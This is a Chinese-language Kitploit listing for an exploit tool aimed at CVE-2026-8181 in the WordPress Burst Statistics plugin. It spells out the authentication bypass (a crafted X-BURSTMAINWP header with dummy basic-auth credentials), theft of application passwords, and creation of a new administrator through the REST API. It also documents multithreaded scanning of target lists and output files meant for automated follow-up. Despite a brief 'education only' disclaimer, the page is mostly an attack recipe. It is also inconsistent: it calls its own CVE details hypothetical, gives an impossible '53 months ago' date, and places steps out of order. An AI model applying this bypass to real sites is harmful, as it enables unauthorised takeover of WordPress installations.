Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-8181 — CVE-2026-8181:Burst Statistics 认证绕过 → REST API 接管并创建管理员。Python 2.7。仅供教育用途。 | Kitploit
工具/GitHubGitHub/jenderal92/cve-2026-8181
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181:Burst Statistics 认证绕过 → REST API 接管并创建管理员。Python 2.7。仅供教育用途。

查看仓库
53个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-8181 - Burst Statistics 认证绕过漏洞利用工具

Python 2.7 版本的 Burst Statistics 插件漏洞(CVE-2026-8181)利用工具,允许未认证攻击者绕过 REST API 认证,获取应用密码,并在存在漏洞的 WordPress 站点上创建新的管理员用户。

⚠️ 免责声明
此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是非法的。请仅在你拥有或拥有明确许可的网站上使用。 更多免责声明请参阅 Jenderal92 封面上的声明。你可以点击 这里 查看。

CVE-2026-8181 影响 WordPress 的 Burst Statistics 插件(补丁之前的版本)。该漏洞位于 REST API 认证机制中,允许攻击者:

  • 通过发送精心构造的 X-BURSTMAINWP 标头绕过认证
  • 通过 /burst/v1/mainwp-auth 端点获取应用密码
  • 通过 WordPress REST API 执行特权操作(列出用户、读取设置、创建新的管理员账号)

功能特性

  • 多线程扫描(默认 10 个线程)
  • 自动检测 WordPress 基础路径(/、/wordpress、/wp)
  • 通过 /wp-json/wp/v2/users 或作者 ID 重定向进行用户名枚举
  • 利用认证绕过实现:
    • 获取应用密码(Base64 编码的令牌)
    • 验证对敏感 REST 端点(设置、插件、管理员用户)的访问权限
    • 创建新的管理员用户(随机凭据)
  • 两个输出文件:
    • res_login.txt – 简洁的管道分隔的 REST API 凭据(易于解析/导入)
    • full_res_login.txt – 包含访问验证和应用密码的完整可读报告

要求

  • Python 2.7(已弃用,但脚本需要)
  • requests 库
root@kitploit:~
pip install requests

用法

  1. 准备目标列表文件(每行一个域名或 IP,可带 http:///https:// 前缀)。

    示例 targets.txt:

    root@kitploit:~
    example.com
    https://vulnerable-site.com
    127.0.0.1/wordpress
    
  2. 运行漏洞利用工具:

root@kitploit:~
python2 CVE-2026-8181.py targets.txt
  1. 结果将保存到当前目录下的 两个文件 中:
    • res_login.txt – REST API 凭据(每个易受攻击的目标一行)
    • full_res_login.txt – 详细报告

命令行选项

参数描述
list.txt包含目标 URL 的文件路径

控制台输出示例

root@kitploit:~
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] 总目标数: 2
[*] 线程数: 10
[*] 基础路径: ['', '/wordpress', '/wp']

[*] 正在扫描: example.com
    尝试路径: /
    检测到用户名: admin
    [+] 存在漏洞!REST API 绕过成功
    [+] 应用密码已获取!
    [+]   用户名: admin
    [+]   应用密码: xxxx xxxx xxxx
    [+]   Base64 令牌: YWRtaW46eHh4eA==
    [+] 已确认访问权限: WordPress 设置
    [+] 已确认访问权限: 已安装插件
    [+] 已确认访问权限: 管理员用户
    [+] 通过 REST API 创建的管理员用户: wp_abc123
    [+] 结果已保存到 res_login.txt 和 full_res_login.txt

输出文件格式

1. res_login.txt – 简洁的 REST API 凭据

每行采用以下管道分隔格式:

root@kitploit:~
target|username|password|email|user_id

示例:

root@kitploit:~
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42

此格式非常适合:

  • 导入密码管理器或数据库
  • 自动化后续操作(例如登录脚本)
  • 使用 cut、grep 或 Excel 快速检查

2. full_res_login.txt – 完整详细报告

对于每个易受攻击的目标,脚本会附加一个可读块:

root@kitploit:~
============================================================
Target: http://example.com
============================================================

[+] 访问验证:
    [+] WordPress 设置
    [+] 已安装插件
    [+] 管理员用户

[+] REST API 凭据:
    用户名: wp_abc123
    密码: random12char
    邮箱: [email protected]
    用户 ID: 42
    URL: http://example.com/wp-admin/
    注意: 使用 X-BURSTMAINWP 标头

[+] 应用密码:
    用户名: admin
    应用密码: xxxx xxxx xxxx
    Base64 令牌: YWRtaW46eHh4eA==

注意: 如果应用密码端点不可用或未返回令牌,则该部分将显示 FAILED。

工作原理

  1. 目标预处理 – 如果缺少则添加 http:// 前缀,去除尾部斜杠。
  2. 路径迭代 – 尝试 /、/wordpress 和 /wp 作为 WordPress 基础目录。
  3. 用户名枚举 – 获取 /wp-json/wp/v2/users 或利用 ?author=N 重定向。
  4. 绕过测试 – 发送 X-BURSTMAINWP: 1 + 基本认证(用户名 + 虚拟密码 CVE-2026-8181)。如果端点 /wp-json/wp/v2/users/me?context=edit 返回 200,则站点存在漏洞。
  5. 漏洞利用 –
    • 请求 /wp-json/burst/v1/mainwp-auth 以获取应用密码令牌。
    • 验证对 /settings、/plugins、/users 的访问权限。

自定义设置

你可以在脚本中修改以下变量:

  • THREADS – 并发线程数(默认 10)
  • BASE_PATHS – 要检查的其他 WordPress 子目录
  • requests 超时值

许可证

本项目仅用于教育目的。使用风险自负。

参考

  • CVE-2026-8181 详细信息(假设性)
  • Burst Statistics 插件(受影响版本)
下载工具
  • 通过 POST /wp-json/wp/v2/users 创建新的管理员账号。
  • 保存结果 – 将简洁的 REST 凭据写入 res_login.txt,将完整详细信息写入 full_res_login.txt。